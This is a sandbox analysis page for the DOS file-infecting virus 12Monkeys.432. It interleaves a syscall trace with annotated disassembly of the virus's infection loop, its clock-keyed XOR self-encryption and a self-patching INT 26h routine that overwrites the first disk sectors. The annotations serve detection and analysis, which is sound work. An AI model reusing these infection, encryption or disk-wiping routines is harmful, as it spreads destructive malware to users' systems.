Sample viewer

vx.netlux.org/Virus.DOS.VCC.12Monkeys.432


Syscalls:

Time | Syscall Op (decimal INT 21h function number, i.e. the value in AH) | PC (return address after the INT) | Syscall Name
2018-12-17T22:14:41.077769135Z 26 PC: 13e91 | Set disk transfer address
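2018-12-17T22:14:41.079551175Z 53 PC: 13e97 | Get interrupt vector (Interrupt = '1' AKA 'Character input') [note: 'Character input' is the name of INT 21h function 01h; the vector requested here is interrupt 01h, the CPU single-step/debug trap]
2018-12-17T22:14:41.080568236Z 53 PC: 13ea4 | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input') [note: 'Auxiliary input' is the name of INT 21h function 03h; the vector requested here is interrupt 03h, the breakpoint trap. Reading the debug vectors is often a precursor to anti-debugging, but this trace does not show what the sample does with them]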
; Disassembly window taken on return from INT 21h AH=2Ch (Get time).
; DL holds the hundredths-of-a-second field; the first compare tests it against 0x0d (13).
; Everything below is clock-dependent, so one sandbox run will not necessarily exercise every branch.
2018-12-17T22:14:41.081571588Z 44 PC: 13eaf | Get time 0x13eaf: cmp dl, 0xd
0x13eb2: jg 0x13eb8 ; hundredths above 13: skip the port write
0x13eb4: mov al, 0x82
0x13eb6: out 0x21, al ; port 0x21 is the mask register of the primary 8259 PIC on PC-compatible hardware; 0x82 sets bits 1 and 7 (IRQ1 keyboard, IRQ7) - presumably to block keyboard input
0x13eb8: mov ah, 0x2c
0x13eba: int 0x21 ; second Get time call; it is the next entry in the trace (PC 13ebc)
0x13ebc: cmp dl, 0x32
0x13ebf: jg 0x13ef0 ; hundredths above 50: skip the message
0x13ec1: mov ah, 9
0x13ec3: lea dx, word ptr [bp + 0x190] ; bp is used as a base for all data references (relocation delta); its value is set outside this window
0x13ec7: int 0x21 ; INT 21h AH=09h: print the '$'-terminated string at DS:DX
0x13ec9: mov ah, 0
0x13ecb: int 0x16 ; BIOS keyboard service AH=00h: wait for a keystroke
0x13ecd: jmp 0x13ef0 ; jumps over the bytes that follow
0x13ecf: nop
; NOTE(review): from 0x13ed0 the disassembler is decoding data, not code. Re-encoding the
; operands below gives the ASCII text "12 Monkeys A " (the window ends mid-string).
; The offsets used elsewhere in this trace are consistent with bp+0x190 = 0x13ed0, i.e. this
; is the string printed by the AH=09h call above - TODO confirm against the sample bytes.
0x13ed0: xor word ptr [bp + si], si ; "12"
0x13ed2: and byte ptr [di + 0x6f], cl ; " Mo"
0x13ed5: outsb dx, byte ptr [si] ; "n"
0x13ed6: imul sp, word ptr [di + 0x79], 0x73 ; "keys"
0x13eda: and byte ptr [bx + di + 0x20], al ; " A "
; Disassembly window taken on return from the second Get time call (INT 21h AH=2Ch).
; DL = hundredths of a second; the first compare tests it against 0x32 (50).
; The next trace entry after this one is Find first file, with no print-string call in
; between, so the message branch was apparently not taken in this run.
2018-12-17T22:14:41.084113728Z 44 PC: 13ebc | Get time 0x13ebc: cmp dl, 0x32
0x13ebf: jg 0x13ef0 ; hundredths above 50: skip the message
0x13ec1: mov ah, 9
0x13ec3: lea dx, word ptr [bp + 0x190] ; bp-relative data reference; bp is set outside this window
0x13ec7: int 0x21 ; INT 21h AH=09h: print the '$'-terminated string at DS:DX
0x13ec9: mov ah, 0
0x13ecb: int 0x16 ; BIOS keyboard service AH=00h: wait for a keystroke
0x13ecd: jmp 0x13ef0 ; jumps over the bytes that follow
0x13ecf: nop
; NOTE(review): from 0x13ed0 the disassembler is decoding data, not code. Re-encoding the
; operands below gives the ASCII text "12 Monkeys A Virus Infected!" followed by 0x07 (BEL).
; The instruction lengths imply an extra 0x66 byte ('f') in front of the arpl encoding.
; The text is a convenient static indicator for this sample - TODO confirm against the raw bytes.
0x13ed0: xor word ptr [bp + si], si ; "12"
0x13ed2: and byte ptr [di + 0x6f], cl ; " Mo"
0x13ed5: outsb dx, byte ptr [si] ; "n"
0x13ed6: imul sp, word ptr [di + 0x79], 0x73 ; "keys"
0x13eda: and byte ptr [bx + di + 0x20], al ; " A "
0x13edd: push si ; "V"
0x13ede: imul si, word ptr [bp + si + 0x75], 0x2073 ; "irus "
0x13ee3: dec cx ; "I"
0x13ee4: outsb dx, byte ptr [si] ; "n"
0x13ee5: arpl word ptr gs:[si + 0x65], si ; "fecte"
0x13eea: and word ptr fs:[bx], ax ; "d!" + 0x07
2018-12-17T22:14:41.086086376Z 78 PC: 13f09 | Find first file
2018-12-17T22:14:41.092300226Z 61 PC: 13f19 | Open file (Filename = 'IIIAAEAAOOOUUYOU$$$$$AIOUNN?!""S')
2018-12-17T22:14:41.098860914Z 63 PC: 13f27 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:14:41.105060232Z 66 PC: 13f36 | Move file pointer
; Disassembly window taken on return from Get time inside the routine that writes the
; virus body to the opened file. DL = hundredths of a second and becomes the XOR key.
; Layout implied by the constants: 0x1b0 bytes are written from bp+0x100, of which the last
; 0x172 (from bp+0x13e) are XOR-ed; the first 0x3e bytes, including this stub, are written in clear.
2018-12-17T22:14:41.106310836Z 44 PC: 13e54 | Get time 0x13e54: cmp dl, 0
0x13e57: je 0x13e50 ; XOR with 0 is a no-op, so a zero value is rejected and the time is requested again (0x13e50 is outside this window)
0x13e59: mov byte ptr [bp + 0x138], dl ; stores the key; bp+0x138 is 6 bytes before the XOR-ed region, which lines up with the immediate of the xor at 0x13e76 (self-modifying code) - TODO confirm
0x13e5d: call 0x13e6f ; first XOR pass over the in-memory body
0x13e60: mov ah, 0x40
0x13e62: mov cx, 0x1b0 ; 0x1b0 = 432, matching "Write 432 bytes" in the trace
0x13e65: lea dx, word ptr [bp + 0x100]
0x13e69: int 0x21 ; INT 21h AH=40h write; the handle in BX is loaded outside this window
0x13e6b: call 0x13e6f ; second XOR pass with the same key undoes the first, restoring the running copy
0x13e6e: ret
; XOR routine: applies a one-byte key to 0x172 (370) bytes starting at bp+0x13e.
0x13e6f: mov cx, 0x172
0x13e72: lea si, word ptr [bp + 0x13e]
0x13e76: xor byte ptr [si], 0x5a ; key immediate as captured in this snapshot; the other snapshots on this page show 0x3a, 0x3f, 0x3f and 0x45
0x13e79: inc si
0x13e7a: dec cx
0x13e7b: jne 0x13e76
0x13e7d: ret
; NOTE(review): in the visible stub only the key byte differs between snapshots, so the
; stub bytes around it remain usable as a detection signature despite the encryption.
; A different routine starts here and is cut off by the window.
0x13e7e: lea si, word ptr [bp + 0x2ac]
0x13e82: mov di, 0x100 ; 0x100 is the entry offset of a DOS .COM image
0x13e85: movsw word ptr es:[di], word ptr [si] ; copies one word from bp+0x2ac to ES:0100 - presumably restoring saved host bytes; the rest is not shown
2018-12-17T22:14:41.108871624Z 64 PC: 13e6b | Write file or device (Write 432 bytes on handle 5)
2018-12-17T22:14:41.12297995Z 66 PC: 13f48 | Move file pointer
2018-12-17T22:14:41.124242568Z 64 PC: 13f53 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:14:41.13096188Z 62 PC: 13f5c | Close file
2018-12-17T22:14:41.139291548Z 79 PC: 13f09 | Find next file
2018-12-17T22:14:41.142084825Z 61 PC: 13f19 | Open file (Filename = 'IIIAAEAAOOOUUYOU$$$$$AIOUNN?!""S')
2018-12-17T22:14:41.14876713Z 63 PC: 13f27 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:14:41.15603525Z 66 PC: 13f36 | Move file pointer
; Disassembly window taken on return from Get time inside the routine that writes the
; virus body to the opened file. DL = hundredths of a second and becomes the XOR key.
; 0x1b0 bytes are written from bp+0x100; the last 0x172 (from bp+0x13e) are XOR-ed first.
2018-12-17T22:14:41.158406172Z 44 PC: 13e54 | Get time 0x13e54: cmp dl, 0
0x13e57: je 0x13e50 ; a zero key is rejected (XOR with 0 changes nothing); 0x13e50 is outside this window
0x13e59: mov byte ptr [bp + 0x138], dl ; stores the key; the offset lines up with the immediate of the xor at 0x13e76 (self-modifying) - TODO confirm
0x13e5d: call 0x13e6f ; first XOR pass over the in-memory body
0x13e60: mov ah, 0x40
0x13e62: mov cx, 0x1b0 ; 0x1b0 = 432, matching "Write 432 bytes" in the trace
0x13e65: lea dx, word ptr [bp + 0x100]
0x13e69: int 0x21 ; INT 21h AH=40h write; handle in BX is loaded outside this window
0x13e6b: call 0x13e6f ; second XOR pass restores the running copy
0x13e6e: ret
; XOR routine: one-byte key over 0x172 (370) bytes starting at bp+0x13e.
0x13e6f: mov cx, 0x172
0x13e72: lea si, word ptr [bp + 0x13e]
0x13e76: xor byte ptr [si], 0x3a ; key immediate as captured in this snapshot; it differs from the 0x5a seen in the previous snapshot of this routine
0x13e79: inc si
0x13e7a: dec cx
0x13e7b: jne 0x13e76
0x13e7d: ret
; A different routine starts here and is cut off by the window.
0x13e7e: lea si, word ptr [bp + 0x2ac]
0x13e82: mov di, 0x100 ; 0x100 is the entry offset of a DOS .COM image
0x13e85: movsw word ptr es:[di], word ptr [si] ; copies one word from bp+0x2ac to ES:0100 - presumably restoring saved host bytes
2018-12-17T22:14:41.160918084Z 64 PC: 13e6b | Write file or device (Write 432 bytes on handle 5)
2018-12-17T22:14:41.163838983Z 66 PC: 13f48 | Move file pointer
2018-12-17T22:14:41.164928098Z 64 PC: 13f53 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:14:41.166700224Z 62 PC: 13f5c | Close file
2018-12-17T22:14:41.172222093Z 79 PC: 13f09 | Find next file
2018-12-17T22:14:41.174185405Z 61 PC: 13f19 | Open file (Filename = 'IIIAAEAAOOOUUYOU$$$$$AIOUNN?!""S')
2018-12-17T22:14:41.180532417Z 63 PC: 13f27 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:14:41.187249022Z 66 PC: 13f36 | Move file pointer
; Disassembly window taken on return from Get time inside the routine that writes the
; virus body to the opened file. DL = hundredths of a second and becomes the XOR key.
; 0x1b0 bytes are written from bp+0x100; the last 0x172 (from bp+0x13e) are XOR-ed first.
2018-12-17T22:14:41.188533958Z 44 PC: 13e54 | Get time 0x13e54: cmp dl, 0
0x13e57: je 0x13e50 ; a zero key is rejected (XOR with 0 changes nothing); 0x13e50 is outside this window
0x13e59: mov byte ptr [bp + 0x138], dl ; stores the key; the offset lines up with the immediate of the xor at 0x13e76 (self-modifying) - TODO confirm
0x13e5d: call 0x13e6f ; first XOR pass over the in-memory body
0x13e60: mov ah, 0x40
0x13e62: mov cx, 0x1b0 ; 0x1b0 = 432, matching "Write 432 bytes" in the trace
0x13e65: lea dx, word ptr [bp + 0x100]
0x13e69: int 0x21 ; INT 21h AH=40h write; handle in BX is loaded outside this window
0x13e6b: call 0x13e6f ; second XOR pass restores the running copy
0x13e6e: ret
; XOR routine: one-byte key over 0x172 (370) bytes starting at bp+0x13e.
0x13e6f: mov cx, 0x172
0x13e72: lea si, word ptr [bp + 0x13e]
0x13e76: xor byte ptr [si], 0x3f ; key immediate as captured in this snapshot; earlier snapshots of this routine show 0x5a and 0x3a
0x13e79: inc si
0x13e7a: dec cx
0x13e7b: jne 0x13e76
0x13e7d: ret
; A different routine starts here and is cut off by the window.
0x13e7e: lea si, word ptr [bp + 0x2ac]
0x13e82: mov di, 0x100 ; 0x100 is the entry offset of a DOS .COM image
0x13e85: movsw word ptr es:[di], word ptr [si] ; copies one word from bp+0x2ac to ES:0100 - presumably restoring saved host bytes
2018-12-17T22:14:41.190556585Z 64 PC: 13e6b | Write file or device (Write 432 bytes on handle 5)
2018-12-17T22:14:41.201464096Z 66 PC: 13f48 | Move file pointer
2018-12-17T22:14:41.202644747Z 64 PC: 13f53 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:14:41.208089918Z 62 PC: 13f5c | Close file
2018-12-17T22:14:41.21735351Z 79 PC: 13f09 | Find next file
2018-12-17T22:14:41.219891233Z 61 PC: 13f19 | Open file (Filename = 'IIIAAEAAOOOUUYOU$$$$$AIOUNN?!""S')
2018-12-17T22:14:41.226542005Z 63 PC: 13f27 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:14:41.236849355Z 66 PC: 13f36 | Move file pointer
; Disassembly window taken on return from Get time inside the routine that writes the
; virus body to the opened file. DL = hundredths of a second and becomes the XOR key.
; 0x1b0 bytes are written from bp+0x100; the last 0x172 (from bp+0x13e) are XOR-ed first.
2018-12-17T22:14:41.239014414Z 44 PC: 13e54 | Get time 0x13e54: cmp dl, 0
0x13e57: je 0x13e50 ; a zero key is rejected (XOR with 0 changes nothing); 0x13e50 is outside this window
0x13e59: mov byte ptr [bp + 0x138], dl ; stores the key; the offset lines up with the immediate of the xor at 0x13e76 (self-modifying) - TODO confirm
0x13e5d: call 0x13e6f ; first XOR pass over the in-memory body
0x13e60: mov ah, 0x40
0x13e62: mov cx, 0x1b0 ; 0x1b0 = 432, matching "Write 432 bytes" in the trace
0x13e65: lea dx, word ptr [bp + 0x100]
0x13e69: int 0x21 ; INT 21h AH=40h write; handle in BX is loaded outside this window
0x13e6b: call 0x13e6f ; second XOR pass restores the running copy
0x13e6e: ret
; XOR routine: one-byte key over 0x172 (370) bytes starting at bp+0x13e.
0x13e6f: mov cx, 0x172
0x13e72: lea si, word ptr [bp + 0x13e]
0x13e76: xor byte ptr [si], 0x3f ; key immediate as captured in this snapshot; same value as the previous snapshot, so a clock-derived key can repeat between copies
0x13e79: inc si
0x13e7a: dec cx
0x13e7b: jne 0x13e76
0x13e7d: ret
; A different routine starts here and is cut off by the window.
0x13e7e: lea si, word ptr [bp + 0x2ac]
0x13e82: mov di, 0x100 ; 0x100 is the entry offset of a DOS .COM image
0x13e85: movsw word ptr es:[di], word ptr [si] ; copies one word from bp+0x2ac to ES:0100 - presumably restoring saved host bytes
2018-12-17T22:14:41.241812024Z 64 PC: 13e6b | Write file or device (Write 432 bytes on handle 5)
2018-12-17T22:14:41.246100132Z 66 PC: 13f48 | Move file pointer
2018-12-17T22:14:41.251715145Z 64 PC: 13f53 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:14:41.253984982Z 62 PC: 13f5c | Close file
2018-12-17T22:14:41.259333352Z 79 PC: 13f09 | Find next file
2018-12-17T22:14:41.261374064Z 61 PC: 13f19 | Open file (Filename = 'IIIAAEAAOOOUUYOU$$$$$AIOUNN?!""S')
2018-12-17T22:14:41.266806144Z 63 PC: 13f27 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:14:41.276116705Z 66 PC: 13f36 | Move file pointer
; Disassembly window taken on return from Get time inside the routine that writes the
; virus body to the opened file. DL = hundredths of a second and becomes the XOR key.
; 0x1b0 bytes are written from bp+0x100; the last 0x172 (from bp+0x13e) are XOR-ed first.
2018-12-17T22:14:41.293389502Z 44 PC: 13e54 | Get time 0x13e54: cmp dl, 0
0x13e57: je 0x13e50 ; a zero key is rejected (XOR with 0 changes nothing); 0x13e50 is outside this window
0x13e59: mov byte ptr [bp + 0x138], dl ; stores the key; the offset lines up with the immediate of the xor at 0x13e76 (self-modifying) - TODO confirm
0x13e5d: call 0x13e6f ; first XOR pass over the in-memory body
0x13e60: mov ah, 0x40
0x13e62: mov cx, 0x1b0 ; 0x1b0 = 432, matching "Write 432 bytes" in the trace
0x13e65: lea dx, word ptr [bp + 0x100]
0x13e69: int 0x21 ; INT 21h AH=40h write; handle in BX is loaded outside this window
0x13e6b: call 0x13e6f ; second XOR pass restores the running copy
0x13e6e: ret
; XOR routine: one-byte key over 0x172 (370) bytes starting at bp+0x13e.
0x13e6f: mov cx, 0x172
0x13e72: lea si, word ptr [bp + 0x13e]
0x13e76: xor byte ptr [si], 0x45 ; key immediate as captured in this snapshot; earlier snapshots of this routine show 0x5a, 0x3a and 0x3f
0x13e79: inc si
0x13e7a: dec cx
0x13e7b: jne 0x13e76
0x13e7d: ret
; A different routine starts here and is cut off by the window.
0x13e7e: lea si, word ptr [bp + 0x2ac]
0x13e82: mov di, 0x100 ; 0x100 is the entry offset of a DOS .COM image
0x13e85: movsw word ptr es:[di], word ptr [si] ; copies one word from bp+0x2ac to ES:0100 - presumably restoring saved host bytes
2018-12-17T22:14:41.296849973Z 64 PC: 13e6b | Write file or device (Write 432 bytes on handle 5)
2018-12-17T22:14:41.300129053Z 66 PC: 13f48 | Move file pointer
2018-12-17T22:14:41.303450413Z 64 PC: 13f53 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:14:41.307700049Z 62 PC: 13f5c | Close file
; Disassembly window taken on return from INT 21h AH=2Ah (Get date): DH = month, DL = day.
; The first compare tests the month against 0x11 (17). This is the date-triggered payload check.
2018-12-17T22:14:41.315397989Z 42 PC: 13f71 | Get date 0x13f71: cmp dh, 0x11
0x13f74: jl 0x13f95 ; NOTE(review): every valid month (1-12) is below 0x11, so with a sane clock this jump is always taken and 0x13f76-0x13f92 never runs; the trace agrees (the next logged call is Set DTA at PC 13f9c)
0x13f76: cmp dl, 8
0x13f79: jl 0x13f95 ; day of month below 8: skip the payload
0x13f7b: mov ah, 0x19
0x13f7d: int 0x21 ; INT 21h AH=19h: current default drive returned in AL
0x13f7f: mov cx, 0x25 ; 0x25 = 37
0x13f82: mov dx, 0
0x13f85: lea bx, word ptr [bp + 0x190] ; same bp+0x190 buffer that the message-print call elsewhere in this trace uses
0x13f89: push ds
0x13f8a: pop es
; NOTE(review): the store below targets bp+0x251, which by the offsets used elsewhere in this
; trace is the operand byte of the INT at 0x13f90, so at run time the instruction would become
; INT 26h (DOS absolute disk write), not the INT 19h shown statically - TODO confirm.
; The register setup (AL drive, CX count, DX first sector, DS:BX buffer) and the "add sp, 2"
; flag clean-up both match the INT 26h interface: a destructive overwrite of the first 0x25
; sectors of the current drive. Static scans for INT 26h miss this; the self-patching store is the indicator.
0x13f8b: mov byte ptr [bp + 0x251], 0x26
0x13f90: int 0x19
0x13f92: add sp, 2
0x13f95: mov ah, 0x1a
0x13f97: mov dx, 0x80 ; 0x80 is the default DTA offset inside the PSP
0x13f9a: int 0x21 ; INT 21h AH=1Ah: Set disk transfer address (logged next in the trace)
; The window ends in the middle of the code that follows.
0x13f9c: mov cx, 3
0x13f9f: push cx
0x13fa0: mov dx, 0x140
2018-12-17T22:14:41.318480388Z 26 PC: 13f9c | Set disk transfer address